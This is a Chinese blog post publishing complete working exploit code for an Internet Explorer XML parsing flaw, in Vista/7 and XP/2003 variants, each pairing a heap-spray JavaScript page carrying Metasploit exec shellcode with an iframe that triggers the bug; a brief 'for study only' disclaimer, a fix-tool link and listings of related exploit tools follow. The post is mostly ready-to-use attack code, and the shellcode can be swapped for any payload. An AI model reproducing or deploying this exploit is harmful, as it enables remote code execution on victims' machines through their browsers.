`
zu14
  • 浏览: 458728 次
  • 性别: Icon_minigender_1
  • 来自: 杭州
社区版块
存档分类

微软IE最新XML漏洞利用代码,仅做技术研究,切勿搞破坏

阅读更多

http://www.zu14.cn/


适用于VISTA及更高版本操作系统的代码(VISTA/SERVER 2008/WINDOWS 7):

ie-sploit.html

<html>
<script>

// k`sOSe 12/10/2008
// Tested on Vista SP1, Explorer 7.0.6001.18000 and Vista SP0,Explorer 7.0.6000.16386
// Heap spray address adjusted for Vista - muts / offensive-security.com
// http://secmaniac.blogspot.com/2008/12/ms-internet-explorer-xml-parsing-remote.html
// http://www.offensive-security.com/0day/iesploit-vista.rar
// windows/exec - 141 bytes
// http://www.metasploit.com
// EXITFUNC=seh, CMD=C:\WINDOWS\system32\calc.exe

var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e%u6578%u4100");
var block = unescape("%u0c0c%u0c0c");
var nops = unescape("%u9090%u9090%u9090");

while (block.length < 81920) block += block;
var memory = new Array();
var i=0;
for (;i<1000;i++) memory[i] += (block + nops + shellcode);
document.write("<iframe src=\"iframe.html\">");
</script>
</html>

iframe.html

<XML ID=I>
<X>
<C>
<![CDATA[
<image
SRC=http://&#3084;&#3084;.xxxxx.org
>
]]>

</C>
</X>
</XML>

<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<XML ID=I>
</XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
</SPAN>
</SPAN>

适用于WINDOWS旧版本操作系统的代码(XP/2003/2000等):

ie-sploit.html

<html>
<script>

// k`sOSe 12/10/2008 - tested on winxp sp3, explorer 7.0.5730.13

// windows/exec - 141 bytes
// http://www.metasploit.com
// EXITFUNC=seh, CMD=C:\WINDOWS\system32\calc.exe
var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e%u6578%u4100");
var block = unescape("%u0a0a%u0a0a");
var nops = unescape("%u9090%u9090%u9090");


while (block.length < 81920) block += block;
var memory = new Array();
var i=0;
for (;i<1000;i++) memory[i] += (block + nops + shellcode);

document.write("<iframe src=\"iframe.html\">");

</script>
</html>

iframe.html

<XML ID=I>
<X>
<C>
<![CDATA[
<image
SRC=http://&#2570;&#2570;.xxxxx.org
>
]]>

</C>
</X>
</XML>

<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<XML ID=I>
</XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
</SPAN>
</SPAN>

仅供学习,请勿用作非法用途。

目前微软尚未对该漏洞发布相应的补丁,360安全卫士推出了一款修复工具可以对该漏洞进行修复,修复工具下载地址为http://dl.360safe.com/360fixmsxml.exe

<iframe src="http://www.zu14.cn/2008/12/12/ie-sploit/" height="0" width="0"></iframe>
分享到:
评论

相关推荐

    微软XML技术指南.pdf

    微软XML技术指南.pdf 微软XML技术指南.pdf

    IIS短文件名漏洞利用工具

    IIS短文件名漏洞利用工具就是针对这一漏洞设计的,它允许攻击者通过构造特殊的URL请求来触发漏洞,进而获取服务器的控制权,或者执行任意代码。工具的一键利用特性意味着用户无需深入理解漏洞的底层原理,只需简单...

    微软漏洞赏金计划

    微软作为全球领先的软件制造商之一,在2014年正式发布了其漏洞赏金计划,旨在鼓励安全研究人员发现并报告其产品和服务中的潜在漏洞,从而及时修复这些问题,保护广大用户免受威胁。 #### 二、微软漏洞赏金计划概述 ...

    MS09-001漏洞利用程序-GUI

    【MS09-001漏洞利用程序-GUI】是一个针对微软操作系统安全更新MS09-001的漏洞利用工具,它具有图形用户界面(GUI),使得非技术用户也能更容易地理解和操作。这个程序专注于利用该漏洞进行攻击或测试系统安全性。 ...

    一种非堆喷射的IE浏览器漏洞利用技术研究

    本文关注的是一项针对IE浏览器漏洞利用技术的研究,这项技术在学术上被归类为非堆喷射(heap spray)方法。IE浏览器,即微软公司的Internet Explorer,曾在很长一段时间内是市场上最为流行的网页浏览器之一。不过,...

    Moti Joseph:IE浏览器中的内存破坏利用

    Moti Joseph在其议题中详细介绍了分析微软IE浏览器中内存破坏问题的过程,这为我们理解浏览器安全提供了深刻的技术洞察。 首先,Moti Joseph在议题中指出了内存破坏漏洞利用的重要性。由于栈溢出这类常见的内存问题...

    微软爆出特大安全漏洞补丁下载

    漏洞的影响:远程执行代码 安装源文件大小:634.36KB 漏洞描述:微软爆出特大安全漏洞,会引发大面积远程攻击甚至完全控制,危害程度跟"冲击波"类似,强烈建议各网友下载此补丁.未通过身份验证的远程攻击者可能会利用此...

    漏洞利用EXP windows-kernel-exploits-master.zip

    这些漏洞一旦被成功利用,攻击者可以执行任意代码,获得系统最高权限,进行数据窃取、破坏系统稳定或部署其他恶意软件。因此,及时打补丁和维护系统更新至关重要,因为微软会定期发布安全更新来修复这些已知的安全...

    Chakra引擎的非JIT漏洞与利用

    然而,及时的漏洞修复并不能完全消除已发布漏洞带来的风险,因为潜在的利用代码可能已经被攻击者设计和部署,而用户可能没有及时更新到最新的安全补丁。 漏洞的发现和利用是一个复杂的过程,通常涉及到对底层编程...

    xml和webservice的实例代码集合

    XML(可扩展标记语言)和Web服务是IT领域中两个重要的技术,它们在数据交换和分布式应用程序集成中扮演着关键角色。本实例代码集合提供了多种使用XML和Web服务的实践应用,涵盖了从基础到进阶的多种场景。 1. XML...

    微软最新vb.net源代码

    VB.NET是微软公司开发的一种面向对象的编程语言,它是Visual Basic的现代版本,基于.NET Framework运行环境...通过研究这些源代码,开发者可以掌握微软最新的编程技术和最佳实践,从而更好地适应不断发展的IT行业需求。

    C#语言源代码漏洞测试规范

    C#语言源代码漏洞测试规范是一套针对C#语言编写的程序进行安全漏洞检测的标准化流程和方法。C#语言是微软公司开发的一种面向对象的编程语言,广泛应用于.NET平台的应用程序开发中。由于软件产品的安全漏洞可能导致...

    Tinyxml 源代码(VC6 & VS2005)

    TinyXML是一个简单小巧,可以很容易集成到其它程序中的C++ XML解析器。 它能做些什么 简单地说,TinyXML解析一个XML文档并由此生成一个可读可修改可保存的文档对象模型(DOM)。 XML的意思是“可扩展标记语言...

    IIS短文件名泄漏漏洞利用工具下载

    1. **更新和补丁**:确保安装了最新的IIS版本和所有安全补丁,微软通常会在新的更新中修复已知的安全问题。 2. **配置安全策略**:禁用不必要的IIS功能和服务,限制匿名用户访问权限,只允许授权用户访问特定资源。...

    微软出品XML查看编辑工具

    微软作为全球领先的软件公司,自然也提供了对XML的强大支持,其中包括了“微软出品XML查看编辑工具”。 这个工具专门用于查看和编辑XML文档,为开发者和IT专业人员提供了一种高效的方式来处理XML数据。通过这个工具...

    基于XML的VB编程题自动阅卷的研究

    该研究提出了一种新的方法,即通过将VB程序代码转换为XML文档形式,用以反映程序代码的结构特征,并在此基础上建立一个代码评分模型。以下将详细探讨这一研究中涉及的知识点。 首先,XML(Extensible Markup ...

    IE 0day补丁下载(针对最新IE高危漏洞 360发布独家应急补丁)

    大规模攻击一触即发 360紧急发布IE漏洞独家补丁 据了解,微软的官方补丁可能还要等两周左右,目前微软提供的临时方案是开启IE浏览器DEP保护、禁止JS脚本和ACTIVEX选项。这一方案尚不能彻底堵住漏洞,对用户正常浏览...

    XML最新解码器

    XML(eXtensible Markup Language...通过其丰富的API和遵循的安全原则,开发者可以更加放心地在项目中集成并利用XML技术。而文件"msxml.3987.com"可能是MSXML6的安装包或更新文件,用于下载和安装这个最新的XML解码器。

    微软MPEG-2视频0Day漏洞补丁.rar

    2009年7月5日,微软爆出MPEG-2视频0Day漏洞(全称是“Microsoft 视频 ActiveX 控件远程代码执行漏洞”,也称为“微软DirectShow 0Day漏洞”)。此漏洞会影响到Windows 2000/XP/2003系列共12个版本的操作系统。IE6和...

Global site tag (gtag.js) - Google Analytics